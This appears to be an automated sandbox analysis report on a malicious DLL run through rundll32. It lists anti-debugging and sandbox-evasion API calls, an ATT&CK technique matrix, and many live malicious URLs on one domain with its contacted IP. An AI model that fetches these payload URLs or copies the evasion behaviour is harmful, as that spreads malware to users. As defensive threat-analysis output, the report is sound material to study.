Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exeAPI coverage: 8.3 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 6.5 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5960Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2468Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B921B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,0_2_6B921B85
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B9338F4 FindFirstFileExW,0_2_6B9338F4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9E1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,3_2_6F9E1B85
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9F38F4 FindFirstFileExW,3_2_6F9F38F4
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 30000Jump to behavior
Source: rundll32.exe, 0000000C.00000002.3289874951.000000000882F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWgG
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008CD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: rundll32.exe, 00000008.00000002.3289577323.0000000008C00000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337362841.0000000008C00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F5E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3289519547.0000000008F85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CFD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007B71000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007B46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008C90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.000000000882F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.000000000888E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007B46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8h
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B9253EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6B9253EE
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B934AF5 GetProcessHeap,0_2_6B934AF5
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B9253EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6B9253EE
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B924EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6B924EDC
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B92DCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6B92DCFD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9E4EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6F9E4EDC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9EDCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6F9EDCFD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9E53EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6F9E53EE

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 131.153.206.231 443
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B9255EB cpuid 0_2_6B9255EB
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6B92503D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6B92503D

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		111
Process Injection		11
Virtualization/Sandbox Evasion		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		111
Process Injection		LSASS Memory21
Security Software Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager11
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Rundll32		LSA Secrets12
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500943 Sample: QEydjQdRxs.dll Startdate: 29/08/2024 Architecture: WINDOWS Score: 88 31 rammenale.com 2->31 35 Antivirus detection for URL or domain 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Sigma detected: rundll32 run dll from internet 2->39 41 3 other signatures 2->41 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 9->11         started        14 rundll32.exe 9->14         started        16 cmd.exe 1 9->16         started        18 2 other processes 9->18 signatures6 43 System process connects to network (likely due to code injection or exploit) 11->43 20 rundll32.exe 14->20         started        23 rundll32.exe 14->23         started        25 rundll32.exe 16->25         started        process7 dnsIp8 33 rammenale.com 131.153.206.231, 443, 49705, 49706 SS-ASHUS United States 20->33 27 rundll32.exe 12 25->27         started        29 rundll32.exe 12 25->29         started        process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
QEydjQdRxs.dll5%ReversingLabs
QEydjQdRxs.dll8%VirustotalBrowse
QEydjQdRxs.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
rammenale.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://rammenale.com/for2/regit.tmp$u100%Avira URL Cloudmalware
https://rammenale.com/for2/aclogY100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtM100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpent100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtPR100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpft100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4kJ100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp(100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpent0%VirustotalBrowse
https://rammenale.com/for2/aclog.txtM1%VirustotalBrowse
https://rammenale.com/for2/regit.tmpPR5100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtT100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp)100%Avira URL Cloudmalware
https://rammenale.com/T0%Avira URL Cloudsafe
https://rammenale.com/for2/aclog.txtR100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpft0%VirustotalBrowse
https://rammenale.com/for2/aclog.txt42100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt6634-1003(100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp%100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpry100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtO100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtZ100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtR1%VirustotalBrowse
https://rammenale.com/for2/aclog.txt4?100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txte100%Avira URL Cloudmalware
https://rammenale.com/d0%Avira URL Cloudsafe
https://rammenale.com/for2/regit.tmpsC:100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtO1%VirustotalBrowse
https://rammenale.com/for2/aclog.txt)100%Avira URL Cloudmalware
https://rammenale.com/k0%Avira URL Cloudsafe
https://rammenale.com/for2/regit.tmp%1%VirustotalBrowse
https://rammenale.com/for2/regit.tmpry0%VirustotalBrowse
https://rammenale.com/for2/aclog.txte1%VirustotalBrowse
https://rammenale.com/for2/regit.tmpsC:1%VirustotalBrowse
https://rammenale.com/for2/aclog.txt4100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtenth100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4Y100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4FA100%Avira URL Cloudmalware
https://rammenale.com/q0%Avira URL Cloudsafe
https://rammenale.com/for2/aclog.txt3100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt0O100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt0100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt:100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpn100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtF100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpw100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpxe.muiE100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpz100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog0%VirustotalBrowse
https://rammenale.com/for2/regit.tmps100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpC:100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpu100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt6634-1003100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt?100%Avira URL Cloudmalware
https://rammenale.com/0%Avira URL Cloudsafe
https://rammenale.com/for2/regit.tmp8a5100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4u100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp6634-1003100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtry100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtQw100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtrw100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpg100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmph100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4n100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt60100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtentindowsINetCookies100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4r100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp08100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpP100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtfw100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtC:100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt&100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt%100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4~100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtft100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpA100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtk100%Avira URL Cloudmalware
https://rammenale.com//90%Avira URL Cloudsafe
https://rammenale.com/for2/regit.tmp;100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txti100%Avira URL Cloudmalware
https://rammenale.com/for2/aclogtxt100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtv100%Avira URL Cloudmalware
https://rammenale.com/60%Avira URL Cloudsafe
https://rammenale.com/for2/aclog.txts100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4s5100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp0100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpmp100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4X100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtentdll8100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtx100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp7100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpc4u100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4Zfrh100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4$100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtdT100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpuk100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
rammenale.com
131.153.206.231
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://rammenale.com/for2/regit.tmptrue
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txttrue
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://rammenale.com/for2/regit.tmp$urundll32.exe, 00000008.00000002.3289370327.0000000008BE3000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtMrundll32.exe, 00000005.00000002.3286428074.000000000317A000.00000004.00000020.00020000.00000000.sdmptrue
  • 1%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpentrundll32.exe, 00000007.00000002.3286915382.00000000028B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286593843.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337436312.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmptrue
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtPRrundll32.exe, 00000005.00000002.3287957318.00000000032C0000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclogYrundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpftrundll32.exe, 00000007.00000002.3286915382.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286593843.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337436312.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp4kJrundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp(rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpPR5rundll32.exe, 00000007.00000002.3286295606.00000000026C0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtTrundll32.exe, 00000006.00000002.3286763260.0000000003289000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp)rundll32.exe, 00000008.00000002.3289919472.0000000008C47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337289222.0000000008C46000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/Trundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://rammenale.com/for2/aclog.txtRrundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt42rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt6634-1003(rundll32.exe, 0000000B.00000002.3289283250.0000000008C74000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp%rundll32.exe, 0000000C.00000002.3286396113.0000000002AAA000.00000004.00000020.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpryrundll32.exe, 0000000C.00000002.3289874951.0000000008814000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtOrundll32.exe, 00000005.00000002.3289519547.0000000008FA7000.00000004.00000020.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtZrundll32.exe, 0000000B.00000002.3286397413.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt4?rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txterundll32.exe, 00000006.00000002.3286763260.0000000003208000.00000004.00000020.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/drundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://rammenale.com/for2/regit.tmpsC:loaddll32.exe, 00000000.00000002.2078622698.0000000000B70000.00000004.00000020.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt)rundll32.exe, 00000006.00000002.3286763260.000000000319A000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/krundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://rammenale.com/for2/aclog.txt4Yrundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtenthrundll32.exe, 00000005.00000002.3286428074.0000000003170000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt4rundll32.exe, 0000000B.00000002.3289283250.0000000008D02000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt4FArundll32.exe, 00000005.00000002.3289519547.0000000008F85000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt3rundll32.exe, 00000006.00000002.3286763260.000000000319A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286397413.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt0Orundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt0rundll32.exe, 00000006.00000002.3289715229.0000000008D34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/qrundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://rammenale.com/for2/aclogrundll32.exe, 0000000B.00000002.3288849622.0000000005132000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3288849622.000000000511A000.00000004.00000020.00020000.00000000.sdmptrue
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt:rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpnrundll32.exe, 00000008.00000002.3289370327.0000000008BFA000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtFrundll32.exe, 0000000B.00000002.3289283250.0000000008C74000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpwrundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpxe.muiErundll32.exe, 00000003.00000002.2054268818.0000000002A5A000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpzrundll32.exe, 00000007.00000002.3289414111.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007B71000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpsrundll32.exe, 00000008.00000002.3288087591.0000000003110000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3288019449.0000000002D40000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpC:rundll32.exe, 00000003.00000002.2054157114.0000000002880000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2053873266.0000000000390000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3286915382.0000000002840000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3286404061.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286340448.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286449420.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286291304.0000000002990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002AA0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpurundll32.exe, 00000008.00000002.3286593843.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337436312.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt6634-1003rundll32.exe, 00000005.00000002.3289519547.0000000008F42000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt?rundll32.exe, 00000006.00000002.3289715229.0000000008D34000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007B46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289577323.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002AAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://rammenale.com/for2/regit.tmp8a5rundll32.exe, 00000007.00000002.3286915382.00000000028CE000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt4urundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
